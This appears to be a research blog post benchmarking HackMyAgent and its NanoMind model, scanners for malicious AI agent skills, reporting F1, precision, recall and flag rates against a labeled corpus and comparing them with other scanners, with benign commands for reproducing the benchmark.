OASB Scanner Benchmark: First Ground-Truth F1 for Skill Scanners

We benchmarked HackMyAgent against a 4,245-sample labeled corpus across 9 attack categories and compared with 9 industry scanners evaluated in Holzbauer et al. (arXiv:2603.16572). NanoMind TME v0.5.0 achieves 89.2% F1 -- the first verified precision/recall score for any AI agent skill scanner.

89.2%

F1 Score (TME v0.5.0)

100%

Recall (Full Pipeline)

87.1%

DVAA Detection Rate

0.82%

False Positive Rate

The Problem

Holzbauer et al. collected 238,180 skills from three marketplaces (ClawHub, Skills.sh, SkillsDirectory) and GitHub. They ran 9 different scanners and found flag rates ranging from 3.8% (Socket) to 41.9% (OpenClaw Scanner).

The critical finding: only 33 out of 27,111 skills (0.12%) were flagged by all scanners. 71.8% of flagged skills were flagged by only one scanner. After adding repository context, only 0.52% of flagged skills remained in suspicious repositories.

None of these scanners reported precision, recall, or F1 because no ground-truth labeled dataset existed. The field had no way to answer: "How accurate is any of this?"

Results

Scanner	F1	Precision	Recall	FPR	Flag Rate
NanoMind TME v0.5.0	89.2%	88.4%	90.0%	0.82%	6.9%
HMA Full Pipeline	81.3%	68.5%	100%	3.20%	10.3%
HMA Static (regex)	67.5%	99.3%	51.1%	0.03%	3.6%

NanoMind TME v0.5.0 achieves the best balanced accuracy: 89.2% F1 with 90% recall and less than 1% false positive rate. The ONNX model was trained on a v8 corpus of 4,500 balanced samples from 5+ real-world sources.

The full pipeline (AST compilation + 6 analyzers + NanoMind) achieves 100% recall -- zero missed malicious samples -- at the cost of more false positives (3.2% FPR). This mode is appropriate when missing an attack is unacceptable.

Static patterns have near-perfect precision (99.3%) but miss about half of attacks. This confirms the field's intuition: regex-only scanning is conservative but incomplete.

DVAA Ground-Truth Validation

As independent validation, we ran the full pipeline against 70 DVAA (Damn Vulnerable AI Agent) scenarios. Each scenario is an intentionally vulnerable setup with a known attack type.

Result: 61 out of 70 detected (87.1%). Four attack categories achieved 100% detection: heartbeat/RCE, persistence, social engineering, and unicode steganography. The 9 missed scenarios were predominantly configuration-only or binary files that the text-based compiler could not process.

Industry Comparison

HMA's flag rates (3.6% to 10.3%) are in the lower, more conservative range of the scanners evaluated in the paper. The key difference: HMA's numbers are backed by verified ground-truth metrics.

Scanner	Flag Rate	Precision	Recall
HMA Static	3.6%	99.3%	51.1%
Socket	3.8%	--	--
NanoMind TME v0.5.0	6.9%	88.4%	90.0%
Snyk	7.7%	--	--
HMA Full Pipeline	10.3%	68.5%	100%
agent-trust-hub	13.8%	--	--
Cisco Skill Scanner	14-17%	--	--
GPT 5.3 LLM	27-39%	--	--
VirusTotal	36.2%	--	--
OpenClaw Scanner	41.9%	--	--

Paper scanners tested on 238K marketplace skills (no ground truth labels). HMA tested on OASB v2 corpus (4,245 labeled samples). "--" = no ground truth available.

Reproducibility

# Clone and run the benchmark
git clone https://github.com/opena2a-org/oasb.git
cd oasb && npm install

# Full benchmark (all 3 adapters, ~7 minutes)
npx tsx scripts/run-benchmark-v2.ts --categorized-only

# DVAA ground-truth comparison
npx tsx scripts/run-dvaa-benchmark.ts

# Quick test (100 samples, ~30 seconds)
npx tsx scripts/run-benchmark-v2.ts --categorized-only --limit=100

References

Holzbauer et al., "Malicious Or Not: Adding Repository Context to Agent Skill Classification," arXiv:2603.16572, March 2026
OASB benchmark dataset and code: github.com/opena2a-org/oasb
DVAA scenarios: github.com/opena2a-org/damn-vulnerable-ai-agent
HackMyAgent scanner: github.com/opena2a-org/hackmyagent
Interactive leaderboard: oasb.ai/benchmark

Back to Research Dashboard